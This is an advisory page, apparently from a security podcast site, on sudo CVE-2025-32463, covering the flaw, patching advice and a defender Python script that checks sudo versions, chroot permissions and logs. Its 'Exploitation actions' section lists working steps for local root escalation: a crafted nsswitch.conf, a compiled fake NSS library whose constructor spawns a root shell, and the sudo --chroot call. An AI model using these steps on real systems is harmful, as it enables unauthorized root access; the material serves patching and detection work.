sudo: local privilege escalation in sudo via untrusted /etc/nsswitch.conf with --chroot (CVE-2025-32463) #shorts
Summary
Welcome to CyberPatch Podcast. In today’s episode we’re diving into CVE-2025-32463, a newly disclosed local privilege escalation vulnerability in the widely used Sudo utility. This flaw allows a non-privileged, local user to gain full root access under certain configurations. We’ll walk you through exactly what’s at risk, how it works, and what steps you need to take right now to protect your systems.
Product details
The vulnerability affects Sudo versions prior to 1.9.17p1, including 1.9.14, 1.9.15, and 1.9.16. Sudo is a core component on most Linux distributions and is also bundled with some macOS deployments. Many organizations rely on Sudo to grant controlled administrative privileges to users without giving them full root credentials.
Vulnerability type summary
Classified as CWE-829, this is an “Inclusion of Functionality from Untrusted Control Sphere” issue. In simple terms, Sudo is loading a security-related configuration file—nsswitch.conf—from a location that can be manipulated by an unprivileged user, breaking the trust boundary between system and user control.
Details of the vulnerability
When Sudo is invoked with the -R or --chroot option, it creates a chroot jail for the target process. However, before dropping privileges, Sudo will read /etc/nsswitch.conf from inside the chroot directory. An attacker who can write to a directory used as the chroot path can place a crafted nsswitch.conf file there. By configuring module lookups or resolver behavior in that file, the attacker tricks the system into loading malicious libraries or modules as root, resulting in full root shell execution. This chain exploits the fact that Sudo trusted the chroot directory without validating the contents of nsswitch.conf.
Conclusion
If you’re running Sudo on Linux or macOS, you need to patch immediately. Update to version 1.9.17p1 or later. Review any automation or scripts that use -R/--chroot and lock down file permissions on chroot directories. As always, apply the principle of least privilege and monitor sudo logs for unusual activity. Stay safe, and thanks for listening to CyberPatch Podcast.
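The three remediation steps above (confirm the installed version, audit the permissions of any directory passed to -R/--chroot, and watch sudo's logs for chroot use) can be scripted. The following is an added defender-side example, not code from the podcast or from the sudo project. It assumes the affected range the page describes (1.9.14 up to, but not including, 1.9.17p1), that `sudo --version` prints a line beginning "Sudo version", and that sudo's syslog line carries a `CHROOT=` field when -R is used; the field name and the sample log lines are assumptions constructed for the example.

```python
"""Defender-side checks for CVE-2025-32463 (sudo --chroot / nsswitch.conf).

Added example; not the page's or the sudo project's code. Assumptions:
 - affected sudo versions are 1.9.14 <= v < 1.9.17p1 (range taken from the page)
 - `sudo --version` output starts with "Sudo version X.Y.Zp N"
 - sudo's syslog line contains "CHROOT=<path> ;" when -R/--chroot was used
"""
import os
import re
import stat

FIRST_AFFECTED = (1, 9, 14, 0)   # first version named as affected on the page
FIXED = (1, 9, 17, 1)            # 1.9.17p1 carries the fix

# Accepts "1.9.16" or a full "Sudo version 1.9.17p1" line; the trailing pN is optional.
_VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?")


def parse_version(text):
    """Turn '1.9.17p1' (or a `sudo --version` line) into a comparable 4-tuple."""
    m = _VERSION_RE.search(text)
    if not m:
        raise ValueError(f"unrecognised sudo version string: {text!r}")
    major, minor, patch, p = m.groups()
    return (int(major), int(minor), int(patch), int(p or 0))


def is_affected_version(text):
    """True when the version falls inside the affected range described on the page."""
    return FIRST_AFFECTED <= parse_version(text) < FIXED


def chroot_dir_is_risky(owner_uid, mode):
    """A chroot root that a non-root user owns, or that is group/world writable,
    lets that user create or replace etc/nsswitch.conf beneath it."""
    return owner_uid != 0 or bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_chroot_dir(path):
    """Stat a real directory and apply chroot_dir_is_risky to it."""
    st = os.stat(path)
    return chroot_dir_is_risky(st.st_uid, stat.S_IMODE(st.st_mode))


# Field name assumed; sudo's syslog records are "key=value ;"-separated.
_CHROOT_RE = re.compile(r"\bCHROOT=(\S+?)\s*;")
_USER_RE = re.compile(r"sudo:\s+(\S+)\s+:")


def find_chroot_invocations(lines):
    """Return (invoking_user, chroot_path) for every sudo log line that used -R/--chroot."""
    hits = []
    for line in lines:
        m = _CHROOT_RE.search(line)
        if not m:
            continue
        u = _USER_RE.search(line)
        hits.append((u.group(1) if u else "?", m.group(1)))
    return hits


# Constructed sample syslog lines (not real captures) in sudo's usual layout.
SAMPLE_LOG = [
    "Jun 30 10:15:01 host1 sudo:    alice : TTY=pts/0 ; CHROOT=/tmp/exploit_chroot ; "
    "PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/id",
    "Jun 30 10:16:44 host1 sudo:      bob : TTY=pts/1 ; PWD=/home/bob ; "
    "USER=root ; COMMAND=/usr/bin/apt update",
]

if __name__ == "__main__":
    for v in ("1.9.13", "1.9.16", "Sudo version 1.9.17p1"):
        print(f"{v!r:>28}: affected={is_affected_version(v)}")
    for user, path in find_chroot_invocations(SAMPLE_LOG):
        print(f"{user} used --chroot={path}")
        if os.path.isdir(path):
            print(f"  directory exists; risky={audit_chroot_dir(path)}")
```

In practice the version string comes from `sudo --version` and the log lines from the host's auth log; any hit from `find_chroot_invocations` whose path `audit_chroot_dir` flags as risky deserves a look, since that is exactly the condition the page describes (a chroot path writable by the invoking user).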
Watch the full video on YouTube: CVE-2025-32463
Remediation and exploitation details
This chain involves the following actors
- Local user: Attacker with non-privileged shell
- System administrator: Responsible for patching and updates
The following systems are involved
- Target host (Runs sudo for privilege escalation control): Victim system
Attack entry point
- sudo --chroot option: Invoking sudo with a user-writable chroot directory
Remediation actions
Exploitation actions
Prepare attacker-controlled filesystem layout
- mkdir -p /tmp/exploit_chroot/etc
- mkdir -p /tmp/exploit_chroot/lib
Direct sudo to load a custom name-service module
- printf 'passwd: files\ngroup: files mymodule\n' > /tmp/exploit_chroot/etc/nsswitch.conf
Embed root-escalation payload in a fake NSS module
- gcc -shared -fPIC -o /tmp/exploit_chroot/lib/libnss_mymodule.so.2 exploit.c
Force sudo to use the attacker-controlled nsswitch.conf
- sudo --chroot=/tmp/exploit_chroot id
Run privileged code in the shared library constructor
- // In exploit.c constructor: setuid(0); execve("/bin/sh", NULL, NULL);
Related Content
NOTE: The following related content has not been vetted and may be unsafe.
- https://www.sudo.ws/security/advisories/
- https://www.sudo.ws/releases/changelog/
- https://www.stratascale.com/vulnerability-alert-CVE-2025-32463-sudo-chroot
- https://www.openwall.com/lists/oss-security/2025/06/30/3
- https://access.redhat.com/security/cve/cve-2025-32463
- https://ubuntu.com/security/notices/USN-7604-1
- https://security-tracker.debian.org/tracker/CVE-2025-32463
- https://explore.alas.aws.amazon.com/CVE-2025-32463.html
- https://bugs.gentoo.org/show_bug.cgi?id=CVE-2025-32463
- https://www.suse.com/support/update/announcement/2025/suse-su-202502177-1/
- https://www.suse.com/security/cve/CVE-2025-32463.html
- [2025-07-02] Article discusses the resolution of Sudo LPE vulnerabilities CVE-2025-32462 and CVE-2025-32463, recommending updates on Linux and macOS systems.
- [2025-06-30] A critical vulnerability in Todd Miller's sudo 1.9.14/1.9.15/1.9.16/1.9.17 allows for privilege escalation via the -R/--chroot argument.
- [2025-07-01] Urgent update needed for Sudo utility to patch local privilege escalation vulnerabilities
- [2025-07-02] New local privilege escalation vulnerabilities, CVE-2025-32462 and CVE-2025-32463, have been identified in the Sudo software, affecting Linux systems.